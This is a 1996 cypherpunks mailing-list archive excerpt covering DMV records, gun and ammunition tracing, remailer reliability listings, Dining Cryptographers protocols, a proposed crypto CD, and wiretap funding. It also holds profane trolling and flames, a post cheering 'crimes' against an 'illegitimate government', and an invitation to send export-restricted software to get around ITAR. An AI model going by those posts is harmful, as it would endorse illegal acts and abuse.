>     http://www.spiritone.com/cgi-bin/plates
>
>Feed it an Oregon licence plate number and it will feed you back all sorts
>of info about the person/victim.



  Not surprising at all.  Unbeknownst to most of the general populace, DMV
records (for the most part) are public records and are subject to Freedom of
Information requests.  AAMOF, I have an account with NYS/DMV which I use to
pull my clients' records when they are charged with DWI and/or other traffic
offenses.  I simply dial into DMV's [outdated] computer and pull the record.
It also came in handy on a personal level when I did not get my registration
card after buying my car and discovered that the dealer had not registered
my car.







************************************************************
Lynne L. Harrison, Esq.       |    "The key to life:
Poughkeepsie, New York        |     - Get up;
lharrison@mhv.net             |     - Survive;
http://www.dueprocess.com     |     - Go to bed."
************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean Sutherland" <maverick@ns.interconnect.net>
Date: Tue, 6 Aug 1996 08:03:18 +0800
To: Hallam-Baker <cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <19960805204130906.AAB148@maverick>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hallam-Baker Wrote -- 
> Date:          Sun, 04 Aug 1996 20:20:20 -0400

> I personally think that tagants is an insuffieicent approach to
> the problem. Given the number of gun related homicides in the
> US it is not unreasonable to require each individual cartridge
> to be stamped with a serial number and for gun dealers to be 
> required to record each individual purchase. That at least 
> was my advice to the UK govt after Dunblane. 

There's four major problems with this.  First off, a large number of 
guns used in homicides are revolvers or derringers (anyone got the 
numbers?).  These guns don't spit out the shells.  So, it would be 
utterly useless to do so.  The second problem is the number of shells 
expelled in the US every day.  I doubt there's enough room on the 
butt end of a shell to print that number (it couldn't be printed on 
the sides, as this would screw up the fit of the shell, and possibly 
weaken it).  And, it'd be almost impossible getting gun manufacturers to
pay for the equiptment that it would take to emprint serial numbers.  
The third number is that cartridges 
are recycled.  Aside from reloading your own, there's a large number 
of people that sweep up brass from gun ranges to reload themselves.  
The idea that someone swept up the brass could get almost anyone off. 
The final problem is the paperwork.  Cops today can barly keep up 
with the paperwork involved with the Brady Bill.  Could you imagine 
if they had to keep track of AMMO purchases?

> If people go arround claiming that ownership of guns is necessary
> so that people can commit acts of treason against the US govt
> then it is inevitable that there will be pressure for greater

The provision to give people the means to commit treason against the 
government are in the Constitution.  That's why the second amendment 
is there -- to empower the people to protect themselves against the 
government.  Then there's the first amendment, which is there 
partially so that the people can keep the government in check with 
speech and the press.

> regulation. The NRA has been playing a bad hand stupidly. By
> raising the militia argument they have played into the hands
> of abolitionists. It would be entirely foolish for the crypto

The NRA, I'm sorry to say, has screwed up royally.  It's about time 
that they regroup, or else they fall.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgUWzVZoKRrkPmSJAQGNPQf/TMJdVIPG+znJdWK3DlxmANXyLpz7qs8Z
ESHxWo5unmVuDMSGhLGNT15GabdlMozgmatM11iFXmtpzXSBDMwUQOGS29ScgF6l
PW3PBJ0AMscr16GFJu7EcaJStXXAKPCb3mIQmd/JEs51uwpPVgz65fMyRhq3LALF
2fSnNybWGpX60QefZfvtxd6ePx5FyO05v5BJD916N9rh5sRcyspO9Bn5gdvqZaEF
MjcYiDuV1qMl1oO7FAF41HDpw1x8hVp1BsUyN812aBl2YbYYxTaQwjE+BaEmExM7
wLgwUBLZ809fqBWeXpGw8CBmy4FmM7KwiI4fxGxdbcgnFBvRavTrdQ==
=SY5x
-----END PGP SIGNATURE-----
   Sean Sutherland    | mailto:maverick@interconnect.net
PGP Key ID - e43e6489 | http://www2.interconnect.net/maverick
-----BEGIN GEEK CODE BLOCK-----
GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++ K w o O-(++) M-- 
V PS+ PE++ Y PGP++ t--- 5+++ X++ R b++ DI+ D+ G e- h! !r y
-----END GEEK CODE BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 5 Aug 1996 22:03:36 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Internal Passports
In-Reply-To: <v02120d27ae2b05587a10@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960805040046.21970A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I had the same problems when I was working at Xerox in Webster, NY. 
Supermarkets just plain didn't want to accept my passport as valid ID.

More recently, I attended an IEEE conference at MITRE in Virginia. To 
enter the building, they required you to fill out a form listing your 
SSN. The forms were taped to the guard's desk, in full view of anyone who 
was curious.

I was horrified and gave a random number.

A friend who was with me (who in fact is on cypherpunks) dutifully gave
her correct SSN. Oh, and they wanted photo ID. I offered press
credentials. Unfortunately for the lackey, it didn't have any sort of
serial or ID number on it he could record.

-Declan



On Sun, 4 Aug 1996, Lucky Green wrote:

> At 15:48 8/4/96, Bill Stewart wrote:
> 
> >I wonder if they'll still accept an American passport; the country
> >has obviously been taken over by Pod People while we weren't looking....
> 
> A US passport is not considered valid ID by the State of Oregon. If
> somebody here doesn't belive this, send someone who looks like he might be
> under 21 into any liquor store in Oregon with just an US passport.
> 
> 
> -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
>    Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
>    Vote Harry Browne for President.
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Tue, 6 Aug 1996 02:59:10 +0800
To: cypherpunks@toad.com
Subject: Re: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
In-Reply-To: <199607311533.LAA05116@mccannerick-bh.mccann.com>
Message-ID: <Pine.SV4.3.91.960805054010.6678B-100000@netsurfer>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 31 Jul 1996, Joseph M. Reagle Jr. wrote:

>   	  				 
> >WASHINGTON, DC, U.S.A., 1996 JUL 30 (NB) -- By Bill Pietrucha.  
> >Tacoma, Washington, has just gained the distinction of being the 
> >only municipality in the United States to tax Internet Access 
> >providers (IAPs) like telephone service providers. 
> >

Hawaii has been taxing this (and everything else incl. collected 
taxes, food & medical) for years :-( calling it a "general excise tax"

#include <standard.disclaimer>
                    _   __     __  _____            ____
                   / | / /__  / /_/ ___/__  _______/ __/__  _____
                  /  |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/
                 / /|  /  __/ /_ ___/ / /_/ / /  / __/  __/ /
================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/===============






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Mon, 5 Aug 1996 22:19:01 +0800
To: cypherpunks@toad.com
Subject: FUCK YOU, SHITOPUNKS
Message-ID: <199608051211.GAA26432@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


FUCK YOU, SHITOPUNKS
DAVID STERNLIGHT





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Mon, 5 Aug 1996 20:48:44 +0800
To: cypherpunks@toad.com
Subject: The Dining Cryptographers in the Disco
Message-ID: <Pine.LNX.3.92.960805062336.6658B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


There is a protocol for anonymous message broadcast which supposedly
detects disruption, can someone tell me how it works? Applied Cryptography
lists a reference to "Advances in Cryptology, Crypto '89 Preceedings"
(page 690) but I dont have a copy of it, I'd appreciate it if someone
could fill me in on what it says.

Thanks!

- Lester





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 6 Aug 1996 01:25:28 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199608051350.GAA16087@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 5 Aug 96 6:48:42 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           *##+-*+++###     3:25  99.99%
alpha    alias@alpha.c2.org               *+++++++-+*+  1:18:11  99.98%
mix      mixmaster@remail.obscura.com     -+--+++-++-   1:28:16  99.96%
treehole remailer@mockingbird.alias.net   -+---++++-++  1:35:49  99.93%
lead     mix@zifi.genetics.utah.edu       +++ ++++++++    38:48  99.87%
haystack haystack@holy.cow.net            ###++***+*##     3:13  99.85%
winsock  winsock@c2.org                   -..--------   4:26:36  99.85%
penet    anon@anon.penet.fi               -----------   8:31:00  99.83%
replay   remailer@replay.com              ********** *     5:01  99.67%
nymrod   nymrod@nym.jpunix.com            -**-+###+**      7:24  99.56%
lucifer  lucifer@dhp.com                  ++++-+++--+   1:12:03  99.53%
c2       remail@c2.org                    +++++++--+-   1:36:27  99.34%
portal   hfinney@shell.portal.com         ###+*+-*## #     2:55  99.28%
ncognito ncognito@rigel.cyberpass.net     --.._-_-.. * 17:16:16  98.94%
nemesis  remailer@meaning.com             +********+      29:19  98.24%
extropia remail@miron.vip.best.com        ---.---__    26:57:48  97.25%
amnesia  amnesia@chardos.connix.com       -- --- ---    2:58:14  96.19%
jam      remailer@cypherpunks.ca            **********    16:40  95.51%
vegas    remailer@vegas.gateway.com       -*#-**#*        13:17  57.14%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 5 Aug 1996 23:56:06 +0800
To: cypherpunks@toad.com
Subject: Re: More to be paranoid about...
In-Reply-To: <1.5.4.16.19960805061137.2aef92e0@pop.mhv.net>
Message-ID: <BwP7RD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Lynne L. Harrison" <lharrison@csbh.mhv.net> writes:
>
>   Not surprising at all.  Unbeknownst to most of the general populace, DMV
> records (for the most part) are public records and are subject to Freedom of
> Information requests.  AAMOF, I have an account with NYS/DMV which I use to
> pull my clients' records when they are charged with DWI and/or other traffic
> offenses.  I simply dial into DMV's [outdated] computer and pull the record.
> It also came in handy on a personal level when I did not get my registration
> card after buying my car and discovered that the dealer had not registered
> my car.

If I remember correctly, it costs $4 for one search (via modem), and one has
to pre-pay $200 to open the account. One can do a free sarch if one's friendly
with the LEO's. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 5 Aug 1996 21:46:28 +0800
To: cypherpunks@toad.com
Subject: Re: Who the hell is ....
In-Reply-To: <Pine.SUN.3.95.960805093641.279F-100000@mercier.gctech.edelweb.fr>
Message-ID: <F7P7RD34w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ben <Ben.Samman@EdelWeb.fr> writes:
> > OK, I'v been on the list a bit now. I see a lot of the same
> > people posting to it,
> > My question is " Who the Hell is Sternlight" At first I thought
> > it was a pen name ( the light on the end of a boat ?? )
>
> He claims he was some ranking official during the Carter administration.

No, no, it's euphemism for a flashlight stuck up someone's rectum,
where "flashlight" is in turn euphemism for "gerbil". :-)

Anyway, whoever had bet that he'd keave this list by now, has won.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 5 Aug 1996 22:35:04 +0800
To: cypherpunks@toad.com
Subject: International Conference on Electronic Markets !
Message-ID: <v03007806ae2b8facd6a0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


From: Ram Chellappa <ram@yama.bus.utexas.edu>
Subject: International Conference on Electronic Markets !
To: www-buyinfo@allegra.att.com
Date: Mon, 5 Aug 96 2:54:04 CDT
Reply-To: ram@cism.bus.utexas.edu

X-Hpvue$Revision: 1.8 $
Mime-Version: 1.0
Content-Type: Message/rfc822
X-Vue-Mime-Level: 4
Mailer: Elm [revision: 70.85]

                            Seventh Conference on
          Organizational Computing, Coordination and Collaboration

               International Conference on Electronic Markets

----------------------------------------------------------------------------
  FOR MORE INFORMATION: http://ecworld.utexas.edu/others/flyer.html
----------------------------------------------------------------------------

 Theme : Electronic Markets
 Date : November 6-8, 1996
 Location : IC2 Institute, 2815 San Gabriel, Austin, Texas 78705
 Questions

 About program: contact Dr. Andrew Whinston at 512-471-8879
 About registration/logistics: contact the RGK Foundation at
 512-474-9298 or jhampton@zilker.net

Sponsors :

    * IC2 Institute
    * Center for Information Systems Management
    * College and Graduate School of Business Administration at The
      University of Texas at Austin;
    * RGK Foundation
    * National Science Foundation
 Who should attend

   * Software developers and managers in the electronic commerce area
   * Executives concerned with developments in banking and finance
   * Executives concerned with developing on-line customer service and
     logistics support
   * Executives who make investments in next generation technology
   * Executives who develop internal operations support
   * Academics in information systems, marketing, finance,
     organizational behavior, and service management concerned with the
     emerging research topics in the electronic commerce domain.




--
RAMNATH K CHELLAPPA                       Ph: 512-467-7813 (home)
Doctoral Candidate			      512-471-7962 (office)
Center for Information Systems Management
Department of MSIS
University of Texas, Austin.       Web: http://cism.bus.utexas.edu/ram
			  	 email: ram@cism.bus.utexas.edu
--Some people have 10 years of experience,
while some have one year of experience,
10 times over !!!

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Tue, 6 Aug 1996 03:02:31 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: The Dining Cryptographers in the Disco
In-Reply-To: <Pine.LNX.3.92.960805062336.6658B-100000@micro.internexus.net>
Message-ID: <m2ivaxlu0t.fsf@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



The paper you want is at 

http://www.zurich.ibm.ch/Technology/Security/sirene/publ/WaPf1_89DiscoEngl.ps.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Tue, 6 Aug 1996 01:19:28 +0800
To: cypherpunks@toad.com
Subject: Destroying client/server model, anonymous broadcasting.
Message-ID: <Pine.LNX.3.92.960805083049.9867A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Getting back to the Dining Crypto Problem, is it possible to complete a
round by passing information around the circle of participants (each
individual communicates and maintains a connection with the person on the
left and right) rather than sending the round results to everyone via a
central server that everyone is connected to? In effect no one would be a
server, or everyone would be a server depending on the way you look at it.
A circular linked list would be maintained and kept in sync by every
client so that error recovery could come into play if someone mysteriously
disconnects. Could it work? How would the protocol differ.

Also I need info on the Disco problem, detecting if someone is tampering.

Thanks.

- Lester





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 6 Aug 1996 00:40:32 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK YOU, SHITOPUNKS
In-Reply-To: <199608051211.GAA26432@zifi.genetics.utah.edu>
Message-ID: <3205FA65.7716@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> FUCK YOU, SHITOPUNKS
> DAVID STERNLIGHT

Why can't we get trolls of this caliber more often?





[ E-mail me today to sign up for your official "I'm a Shitopunk" shirt! ]

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 6 Aug 1996 03:08:25 +0800
To: "Brock N. Meeks" <hua@chromatic.com>
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now ...
Message-ID: <199608051546.IAA09508@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:52 AM 8/2/96 -0700, Brock N. Meeks wrote:
>
>On Thu, 1 Aug 1996, Ernest Hua wrote:
>
>> Louis Freeh is now asking the Congress for $2 billion to fund
>> Digital Telephony.  Yes, that is FOUR TIMES what he said it
>> would cost the taxpayers to give up their own privacy.  Score
>> one for the cynics who said $500 million was not enough.
>
>I broke the story about how much Digital Telephony would *really* cost in 
>CyberWire Dispatch more than two years ago.  The price tag in my piece:  
>"... at least $2 billion..."  In that Dispatch I wrote that the Clinton 
>White House had made the decision to support the bill based on a flawed 
>cost/benefit analysis study the FBI had done.

Which should remind us...  While the costs are going up, so far undetermined 
is the "benefits" that are supposed to accrue from this bugging ability.   
How many crimes, approximately, are going to be solved or prevented by the 
expenditure of this $2 billion dollars?  One hundred?  A thousand?  Even if 
it were 10,000, that would still be $200,000 per crime.  Is there no cheaper 
way to prevent those crimes?

And, moreover, do we REALLY want to prevent those "crimes"?   If they are 
attacks on an illegitimate government that is violating our rights, as far 
as I can see we want to see those "crimes" succeed, not fail.

Let's put their feet to the fire:  They should be required to show a 
reasonable estimate of the benefits as well as an apparently phony initial 
estimate of the costs.  If they respond that they can't estimate the 
benefits, then why do they want us to incur the costs.

However, the real answer is even simpler.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 5 Aug 1996 17:49:27 +0800
To: cypherpunks@toad.com
Subject: Re: crypto CD source
Message-ID: <9608050705.AA29297@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Aug 05 09:03:30 1996
Well,

I could.

Estimated prices (USD) - If I have at least 300 "certain" buyers:

CDROM with 2-color label and jewel-case: USD 13.-
Shipment US:                             USD  3.- (swiss mail sucks!)   
Shipment Europe:                         USD  2.-

Since the origin of those CD's is Switzerland, no ITAR would apply.

If you're interested (at least 300 of you), mail me. 
Subject line: CryptoCD
Anonymous guys ignored (but data handled confidentially and encrypted on my 
machine).
If you want more than one, send more than one mail (but with a different 
body, so I can kill duplicated mails).
Once I get more than 300 requests, I'll start putting it together and have 
it mastered. At that point I will request a written order (fax or so). If 
anyone has a better idea on how to handle the stuff, mail me...

> I have about 100MB (compressed) of crypto archives, papers, source code,
> etc etc, reasonably well organised with descriptions of each file.  I've
> got a friend to put it on CD, but only for my own use.  If there's
> someone who can get them done in bulk outside the US you could probably
> use this as a crypto CD (I don't think there's anyone in NZ who could do
> it, and I don't really want the hassle of organising the whole thing).
- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMgWcxBFhy5sz+bTpAQE1/gf/eJI+dt1guw0joLKoBpm0ShpvK3/fHFwb
SUlMJSaLgEODR9DRCC+uYc3+mRTNLrup8w1XIcQO1OAZO/GQumL97y8TtLp8fBpY
FcNTYxtXY/UflHE5OySLWIz4jfNArIpZBxXb/zuUqrAqCj5NsWWHUsb45CM/j8cy
1dYT5wcoGELbJiZy1jVZV6eEmqliZIZAtD+fU+bq4oJIgDRCEDWt6RTJPhoHfx5F
wxEuOkpeBQi8uJD9gL85lk5S7Exa1n/0u8+UgE1sm9UMIRA8IOzRK3lIlRvT+0VI
0r2lK4wnKdhmILkPcxGq+82bUZ7HUepS4oZGAduzhW73ANtMEzVPxw==
=5+88
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 5 Aug 1996 17:13:59 +0800
To: cypherpunks@toad.com
Subject: Re: crypto CD source
Message-ID: <9608050710.AA29333@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Aug 05 09:07:49 1996
Addendum: If I have more than 1000 buyers, the price drops to around 9 USD 
per CDROM.

>Estimated prices (USD) - If I have at least 300 "certain" buyers:

>CDROM with 2-color label and jewel-case: USD 13.-
>Shipment US:                             USD  3.- (swiss mail sucks!)   
>Shipment Europe:                         USD  2.-
>Since the origin of those CD's is Switzerland, no ITAR would apply.
- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMgWdxhFhy5sz+bTpAQEsmQf9GwGi2Mz3e6/HlTA0Ry5FpI14uPxk7qzS
id7GJ50dL88q8M0JcLEOEWu3SZuhvgInV7aG3YzhjyaOs8tmCW1WKilUzgDXyIMQ
mnvlqfWilquKRQN2LW+5DjBaECeuDTHSYH/EJofsU7v6ivLBCe39yM51h+5SFG0c
mZRQebJFBge6udvhFfdtoDWMP7D1pZE+6ZtOCFeeZUmntNQtGH7KLD/rijfiuFWN
uwl1d2779QDhu4FtEOm363f9HO4r2fU7K5B7g0dSeBF2uhZCgcJd7TzhwkmSupxO
rT0VyJtYy6YcTs9YFbvxNABQ6RtRvKVbSxzLGAdPkAKXFDFodjTw6w==
=2Z4p
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <Ben.Samman@EdelWeb.fr>
Date: Mon, 5 Aug 1996 17:44:11 +0800
To: Charley Sparks <sparks@bah.com>
Subject: Re: Who the hell is ....
In-Reply-To: <2.2.32.19960802100835.0069d380@pop1.jmb.bah.com>
Message-ID: <Pine.SUN.3.95.960805093641.279F-100000@mercier.gctech.edelweb.fr>
MIME-Version: 1.0
Content-Type: text/plain


> OK, I'v been on the list a bit now. I see a lot of the same
> people posting to it, 
> My question is " Who the Hell is Sternlight" At first I thought
> it was a pen name ( the light on the end of a boat ?? )

He claims he was some ranking official during the Carter administration.

To get more information do an AltaVista search for him--I seem to remember
some FAQ on this exact question.


Ben.
____
Ben Samman.................................................ben@edelweb.fr
Paris, France                 		Weather has improved. Stay tuned.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Tue, 6 Aug 1996 04:02:05 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: fbi, crypto, and defcon
In-Reply-To: <1.5.4.32.19960805124321.003064b0@giasdl01.vsnl.net.in>
Message-ID: <v03007804ae2bd3eda69b@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta <amehta@giasdl01.vsnl.net.in> writes:

>
>True, though even better would be simply to charge you a flat
>rate. If billing is that expensive, why bother?
>

Tragedy of the Commons.

Flat rate works only if no single user can use more than
a tiny fraction of the total bandwidth.

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter honeyman <honey@citi.umich.edu>
Date: Tue, 6 Aug 1996 02:59:34 +0800
To: cypherpunks@toad.com
Subject: Re: Tolerance (fwd)
Message-ID: <199608051349.GAA22092@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh writes:

> This is attempted proof by credentalism. I call him on it. 
> 
> Okay, Jim, what _do_ your lawyers say on this? Have you asked them? I,
> too, have an attorney, a civil liberties specialist and a graduate from
> Princeton law. So what? 

declan, you are a fucking liar, and i am calling you on it.  princeton does
not have a law school.

	peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 5 Aug 1996 18:28:19 +0800
To: cypherpunks@toad.com
Subject: Re: crypto CD source
Message-ID: <9608050810.AA04146@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Aug 05 10:08:19 1996
I'm looking for contents for the crypto CD.

Since this CD will (might) be mastered in Switzerland, no ITAR applies to 
the CD, but if anyone wants to include some restricted stuff, send it to me 
(dat, disk or encrypted email)

Address: Pini Computer Trading
         "Crypto CD"
         Hofwiesenstr. 234
         8057 Zuerich
         Switzerland

My wish list:

- - PGP
- - A lot of algorithms in C, Pascal, ASM (for diverse processors)
- - Private Idaho
- - Pronto Secure
- - a suite of html pages describing all files (I'll probably have to do that
  myself)
- - Netscape (the secure versions, if its legally feasable -> Netscape?)
- - Crypto papers
- - Crypto analysis papers
- - Lawtexts concerning crypto (ITAR, France, ...)

Anything else?


- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

